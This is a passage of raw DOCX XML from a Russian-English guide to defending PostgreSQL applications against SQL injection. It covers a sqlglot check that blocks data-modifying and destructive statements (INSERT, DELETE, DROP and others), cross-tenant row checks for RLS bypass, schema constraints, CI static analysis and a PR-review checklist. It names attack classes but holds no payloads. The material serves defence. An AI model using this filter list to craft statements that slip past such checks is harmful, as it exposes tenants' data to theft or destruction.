          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for node in tree.walk():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if isinstance(node, (sqlglot.exp.Insert, sqlglot.exp.Update,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                              sqlglot.exp.Delete, sqlglot.exp.Drop,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                              sqlglot.exp.Create, sqlglot.exp.AlterTable)):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DS-workshop2.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует sqlglot для именно этого class анализа. Pre-execution check ловит ряд атак (stacked queries, CTE-side-effects), которые не блокируются параметризацией одной командой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-ref: [[reference-ds-workshop-repo]] для context, где это уже работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-side cross-row consistency checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для RLS bypass (3.17.X), особенно R8/R9 в multi-tenant SaaS — application-side проверка результатов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def query_user_data(tenant_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows = await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT * FROM orders WHERE tenant_id = :tid"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"tid": tenant_id}</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rows = rows.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Verify каждая row принадлежит запрошенному tenant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for row in rows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if row.tenant_id != tenant_id:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            log.error("RLS bypass detected",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      requested=tenant_id, leaked=row.tenant_id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            raise SecurityError("Cross-tenant data leak")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это catches R8 + R9 цепочку (если она материализуется в данных) до того, как leak дойдёт до клиента. Server-side fix предпочтительнее, но application-check — defence-in-depth до patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema-level migrations: миграции как защита</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Структурные приёмы — то, что встроено в schema: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`CHECK` constraints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на колонки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK (status IN ('active', 'pending', 'cancelled'))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ограничивает domain без application-проверки.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`NOT NULL`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + dataframe expected по умолчанию.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Enum-типы</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TYPE status_t AS ENUM (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; insert чужого значения вернёт ошибку.</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Foreign keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: cascade rules; защита от orphan-records при manipulation injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это снижает «доступную поверхность» injection-результатов — даже если injection прошла, она ограничена column-domain-ом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Static analysis в CI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-commit / pre-merge static analysis catches многие SQL-injection vectors на этапе code review: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Bandit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python): детектит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute(f"...{var}...")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns.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SonarQube / Snyk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: SQL injection rules для основных языков.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DS-workshop2.0 rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + LLM-judge — domain-specific для PostgreSQL-injection-кейсов (см. [[reference-ds-workshop-repo]]).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-ref: rules.py поставляется со списком 9 классов; раздел 5.7 — обоснование, почему детерминированный pre-execution фильтр (rules.py) + LLM-judge — minimal viable pipeline для PR-review гейтa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметризация остаётся базой; 5.7 — для случаев, где параметризация одна не покрывает.</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5.2</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psycopg.sql.SQL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pgx.Identifier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pg-format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — client-side эквиваленты server-side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5.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side checks (cross-row consistency, sqlglot pre-execution) дополняют server-side audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с категориями 3.X.N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3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stacked queries — sqlglot detects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в SQL и блокирует до execute.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3.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data-modifying CTE — sqlglot detects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (INSERT/UPDATE/DELETE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и блокирует на read-endpoint.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3.14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY — whitelist основное mitigation.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3.15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> LIKE / tsquery —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вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.15.3).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3.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identifier injection — client-side helpers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql.Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и аналоги).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3.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RLS — application-side cross-row checks для detection до server-fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари раздела 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 5 собирает mitigations, разбросанные по 3.X.N, в одно место — для team-wide PR-review-чек-листа и DBA-конфиг-аудита. В отличие от 3.X.N, где защита упоминается контекстно при разборе конкретной атаки, раздел 5 даёт защитные паттерны, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">организованные по технике</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Checklist для PR review (developer)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Все user-controlled values идут через параметризацию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:name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с params-tuple). См. 5.1.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Конкатенация в SQL-тексте отсутствует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f-string,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fmt.Sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, template literal с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См. 5.1.</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Identifier-ы (имена таблиц, колонок) — через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whitelist, или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_regclass()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
